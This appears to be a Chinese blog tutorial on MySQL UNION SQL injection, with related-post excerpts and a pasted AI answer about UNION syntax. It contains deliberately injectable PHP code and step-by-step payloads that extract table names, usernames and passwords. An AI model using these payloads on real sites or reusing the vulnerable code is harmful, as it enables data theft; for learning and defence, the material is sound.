mysql注入 —— union

最新推荐文章于 2025-11-06 09:12:02 发布
原创 最新推荐文章于 2025-11-06 09:12:02 发布 · 762 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了在PHP中合并多个语句结果集的方法,还提及利用特定方式猜测字段数。阐述了查看当前数据库名、用户名、表及表字段的查询操作,强调查询结果输出顺序要与PHP代码对应,否则可能看不到结果。

union可以用于合并两个或多个select语句的结果集
场景:
PHP中使用的查询代码大致如下(可能有语法错误)

$id = $_GET['id'];
$sql = "select * from users where id = '$id' limit 0, 1";
$result = mysqld_query($sql);
$row = mysqld_fetch_array($result);
if($row) {
	echo $row['username'];
	echo '<br>';
	echo $row['password'];	
} else {
	print_r(mysqld_error());
}

从代码中可以看出,$id是个突破点,不过要处理好',否则会出现语法错误。

可以用' or '1' = '1,则实际查询语句为「select * from users where id = '' or '1' = '1' limit 0, 1
也可以用' --+(--+相当于注释标识符),则实际查询语句为「select * from users where id = ''

利用order by可以猜测字段数,其后跟着字段名,也可以跟着字段索引,所以通过输入不同大小的数字,利用当数字超过实际字段数就会出错,可以猜测出实际字段数。

查看当前数据库名和用户名
' union select 1, database(), user()

得到数据库名后,查看其中的表
可以在information_schema数据库中的tables表中查询,对应字段为table_name,还要限定字段table_schema为对应的数据库名才可以

select table_name from information_schema.tables where table_schema = "test_db";

但是这样输出的结果会是一个记录集,根据本文的代码,是不能全部看到的,所以要借助group_concat函数拼接成一个记录
' union select 1, group_concat(table_name), 3 from information_schema.tables where table_schema = 'security' --+

查询其中一个表的字段,这里用user表做例子,
还是使用information_schema数据库,这次使用columns表,查询字段为column_name,限制字段为table_name
' union select 1, group_concat(column_bame), 3 from information_schema.columns where table_name = 'user' --+

查询结果怪怪的,检查了下,table_name的值少打了个s

查询表中内容
union--+之间使用对应的sql语句就可以了,但是输出字段的顺序要和php代码对应,否则可能看不到结果。
比如这边在user表里查询id为2的用户(其实和直接查没什么差别,但是这里只是举例子)
' union select 1, username, password from users where id = 2 --+

SQL注入——联合查询union
Cwillchris的博客
06-02 858
SQL注入之联合查询超详细原理讲解
2-Web安全——union联合注入
网络安全
05-05 1035
1. 联合查询注入 联合查询注入是使用union联合查询进行注入的一种方式,联合注入方式的前提是在一个网站的页面中,后端执行SQL语句查询数据库中的数据,然后客户端将数据显示在页面中,通过union联合查询注入可以获取到目标网站的数据库里的所有用户名和密码。 2. MYSQL相关知识 那如何获取数据库中的用户名和密码等数据呢? 在此之前需要了解MYSQL数据库的相关知识,MYSQL ...
MYSQL联合注入
qq_39654116的博客
01-04 343
目录简介特定变量查询步骤Mysql版本<5.0Mysql版本>=5.0注入语句 简介 联合注入是使用了union select联合查询,通常用来拼接在where后面,联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截 特定变量 1\. SCHEMATA表 : 提供了当前mysql实例中所有数据库的信息。 2\. TABLES 表 : 提供了关于数据库中的表的信息。 3\. C
Mysql注入之一 联合注入
笨蛋9的博客
02-17 3313
一 前言作者也在学习web安全,可能文章中或多或少存在一些错误内容。写些手工注入的文章,一方面能加深对这部分知识的印象,一方面也能大家互相学习。 有人可能问:数据库注入不是有很多非常强大的工具,如sqlmap,为什么还要去花些时间去学习手工注入。虽然使用sqlmap等注入工具能很轻松的对拖一个存在注入漏洞无安全狗的网站的数据库,但却无法知道注入的全过程,不方便后续写一些自动化测试的脚本,同时由于是
MySQL SQL注入防御全攻略:原理、攻击与防护实践
最新发布
✨ 欢迎来到【Seal ^_^ 的优快云博客】!✨
11-06 1万+
SQL注入(SQL Injection)是一种将恶意SQL代码插入到应用程序输入参数中,从而欺骗服务器执行非预期SQL命令的攻击技术。fill:#333;color:#333;color:#333;fill:none;攻击者构造恶意输入应用程序拼接SQL数据库执行恶意代码数据泄露/破坏开发阶段:采用参数化查询、输入验证架构层面:实现最小权限、网络隔离运维层面:定期扫描、及时更新随着技术的发展,新型防护技术如RASP(运行时应用自我保护)和AI驱动的异常检测将成为未来防御SQL注入的重要方向。
SQL注入系列篇之union联合注入
d59hao的博客
04-27 927
union注入攻击,通过unionunion all连接,将自己写的SQL拼接到原始SQL中,从而达到执行任意SQL语句的效果。
mysql联合注入
qq_42409373的博客
06-10 330
union操作符: 用于合并两个或多个查询语句的结果。 union内部的select语句必须拥有相同的数量的列,列也必须拥有相似的数据类型,同时,每条select语句中的列的顺序必须完全相同 union语法: union select column(s) from table union select column(s) from table union all select column(s) from table union select column(s) from table 注:如果前后两条
SQL注入union 联合注入
weixin_53711701的博客
01-16 6281
SQL注入union联合注入
sql注入——union联合注入
hintll的博客
06-22 1137
sql注入——union联合注入 union注入是sql注入的一大类型 在做有关sql联合注入时一般用以下思路进行解题: 1.首先要找到能与数据库交互的注入点: 2.测试字段的数量,判断SQL语句查询的列数: 在这里我们使用的命理是order by 通常构造:?id=1’ order by sum–+ 和 1’ order by sum# 这里的sum指代的是数字从1开始逐个测试直至3回显有报错为止: ?id=1’ order by 1–+ ?id=1’ order by 2–+ ?id=1’ orde
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1571
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
DVWA之sql注入——联合注入和报错注入
Williamanddog的博客
12-20 2758
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
mysql手工注入过waf_Mysql 手工注入【常规 Union 查询篇】
weixin_30921875的博客
02-08 226
文章来源于:lsh4ck's Blog在开始真正的注入技巧之前,我们先来大致回顾下必要的 mysql 数据库基础下面是注入 Mysql 时经常会用到的一些单行函数,熟练使用是灵活注入的前提,尤其是在对抗一些 Waf 的时候字符串连接函数,将多个字符串连接成一个字符串,注意,中间只要字符串有一个为空,最后结果也为空 同样是连接多个字符串,但可以在开头指定分隔符,跟 concat()稍微不同,它会自...
MySQLunion联合注入
2301_79299101的博客
09-18 287
我们通过-1' union select 1,(select XXX_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)#当输入的参 x 为整型,Sql 语句类型大致如下:select * from <表名> where id = 'x'这样就要用X'and'1'='1和X'and'1'='2来判断了。1,判断是否存在sql注入:通常是id=XXX’输入,看页面是否会报错,如果有报错,则存在sql漏洞。
Mysql注入
天天学安全专属博客
10-28 4990
mysql注入,包括union注入,数据库跨库注入,常见的注入绕过方法和数据库文件读写
SQL注入系列之PHP+Mysql手动注入(一)----数字型
fendo
01-01 1万+
常见的几种SQL注入 1.数字型 2.字符型 3.文本型 4.搜索型(POST/GET) 5.cookie注入 6.SQL盲注 MySQL报错注入基本流程: Mysql注入步骤 1.判断sql注入 2.猜解表名 3.猜解列名 4.猜解字段内容 5.导出webshell 1.判断sql注入 ○提交单引号' ○and大法和or大法
mysql union as 注入_sql注入入门 之 mysql 常规注入 [ union方式 ]
weixin_39860123的博客
02-07 199
1,常规数字型 mysql 实例注入点,如下:1https://www.vuln.com/md_materia_profile_view.php?viewid=22,依旧先尝试下经典的单引号,如下,虽然没暴露出明显的数据库报错信息,但我们发现,此时返回的页面已经异常了,经验判断,十有八九是个注入点,先不管那么多,我们继续1https://www.vuln.com/md_materia_profil...
Mysql注入union联合注入、报错注入、布尔盲注、时间盲注
Thunderclap的博客
11-14 5917
Union联合注入 union联合注入第一步 判断是否存在注入,判断注入点类型 1 and 1=1-- (整型) 1 and 1=2-- (整型) 1’ or ‘1’='1 (字符型) 1’ or ‘1’ = '2 (字符型) 表示:如果用户可控的传值位置不在末尾,那么#以后的sql语句会注释掉,不进行编译 and 表示:and两边都为真时,那么结果为真,返回正确结果,反之返回false or表示:or两边只要有一边为真,那么结果为真,返回正确结果,反之返回false 获取数据库中信息:判断列数 1
mysql union联合注入
Sys1em32 安全之路
12-05 350
记录一下联合查询常用的手工注入语句,这里以dvwa为例,联合查询页面必须要有回显 0x01.判断是否存在注入点: 一般添加单引号查看是否报错,或者and 1=1查看页面是否正常显示,and 1=2查看是否报错,判断存在注入。 0x02.判断字段数 注入语句:http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=1'+orde...
mysql联合注入_SQL最易懂系列教程(3.union联合查询注入补充)
weixin_39943547的博客
02-19 223
上节内容我们讲了union联合查询注入的大致步骤,在第5步查询数据库中的表,第6步查询表中的字段名我们用到一些查询语句这里我们进一步说明一下。1.在MYSQL数据库安装好以后,就已经内置了几个库其中MYSQL内置的information_schema数据库,它功能强大,是我们进行MYSQL注入的基石。通过information_schema我们可以窥透整个MYSQL的运行状况,也可以查看到数据中的...
mysqlunion函数的用法
07-29
<think>我们正在讨论MySQL中的UNION操作符。根据用户的问题,他们想了解UNION的使用方法和示例。根据引用内容,我们可以总结如下: 1. UNION用于合并两个或多个SELECT语句的结果集。 2. UNION内部的每个SELECT语句必须拥有相同数量的列,列也必须拥有相似的数据类型,同时列的顺序必须相同。 3. UNION默认去重,如果不需要去重,可以使用UNION ALL,它更快,因为不进行去重。 此外,引用中提供了几个示例: - 引用[1]展示了一个简单的UNION SELECT示例:`UNION SELECT 1,2,3`,并说明它会与原始查询合并返回新的结果集。 - 引用[2]和[3]展示了在子查询中使用UNION ALL,然后进行分组求和:`select id,sum(num) from (select * from ta union all select * from tb) as tmp group by id;` 和类似的形式。 因此,我们可以这样组织回答: 1. 先解释UNION的作用和规则。 2. 说明UNIONUNION ALL的区别。 3. 给出示例,包括基本示例和引用中的复杂示例(使用子查询和分组求和)。 同时,根据系统指令,我们需要在行内数学表达式使用$...$,独立公式用$$...$$,但这里没有数学公式,所以主要注意代码块的格式和中文回答。 最后,生成相关问题。 注意:引用标识要自然地添加在引用内容的末尾。由于我们的引用来自站内,所以我们在相关位置添加[^1]、[^2]、[^3]。</think>### MySQL UNION 操作符详解 在 MySQL 中,`UNION` 操作符用于**合并两个或多个 SELECT 语句的结果集**,并自动去除重复行。其基本语法如下: ```sql SELECT 列1, 列2 FROM 表1 UNION [ALL] SELECT 列1, 列2 FROM 表2; ``` #### 核心规则 1. **列数量与类型一致** 所有 SELECT 语句必须包含相同数量的列,且对应列的数据类型必须兼容。 ```sql -- 有效(列数相同) SELECT id, name FROM users UNION SELECT product_id, product_name FROM products; -- 无效(列数不同) SELECT id FROM users UNION SELECT id, name FROM products; -- 报错! ``` 2. **UNION vs UNION ALL** - `UNION`:自动去重(默认行为) - `UNION ALL`:保留所有重复行(性能更高) ```sql -- 示例:统计合并表数据(引用[2][3]) SELECT id, SUM(num) FROM ( SELECT * FROM ta UNION ALL SELECT * FROM tb ) AS tmp GROUP BY id; ``` #### 使用示例 假设有两个表: ```sql -- 表A: sales_q1 +----+-------+ | id | sales | +----+-------+ | 1 | 100 | | 2 | 200 | +----+-------+ -- 表B: sales_q2 +----+-------+ | id | sales | +----+-------+ | 2 | 200 | | 3 | 300 | +----+-------+ ``` 1. **基础合并(自动去重)** ```sql SELECT id, sales FROM sales_q1 UNION SELECT id, sales FROM sales_q2; ``` **结果**: ``` +----+-------+ | id | sales | +----+-------+ | 1 | 100 | | 2 | 200 | -- 重复值仅出现一次 | 3 | 300 | +----+-------+ ``` 2. **保留重复行(UNION ALL)** ```sql SELECT id, sales FROM sales_q1 UNION ALL SELECT id, sales FROM sales_q2; ``` **结果**: ``` +----+-------+ | id | sales | +----+-------+ | 1 | 100 | | 2 | 200 | -- 保留重复值 | 2 | 200 | | 3 | 300 | +----+-------+ ``` 3. **复杂应用:合并后聚合统计**(引用[2][3]) ```sql SELECT id, SUM(sales) AS total_sales FROM ( SELECT * FROM sales_q1 UNION ALL SELECT * FROM sales_q2 ) AS combined GROUP BY id; ``` **结果**: ``` +----+-------------+ | id | total_sales | +----+-------------+ | 1 | 100 | | 2 | 400 | -- 原始值200+200 | 3 | 300 | +----+-------------+ ``` #### 注意事项 1. 列名以第一个 SELECT 语句为准 2. 排序需放在最后: ```sql (SELECT id FROM users ORDER BY id DESC) UNION (SELECT id FROM products) ORDER BY id; -- 正确:全局排序 ``` 3. 常用于分表数据合并或跨库查询[^1] --- ### 相关问题 1. `UNION` 和 `JOIN` 在数据合并时的主要区别是什么? 2. 如何优化包含 `UNION` 的大数据量查询性能? 3. `UNION` 操作符在 SQL 注入攻击中可能被如何利用?如何防范?[^1] [^1]: MySQL注释区别,union使用,group_concat使用---清风 [^2]: MySQL入门笔记 —— 027 union查询面试题 [^3]: mysql中的UNION面试题
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值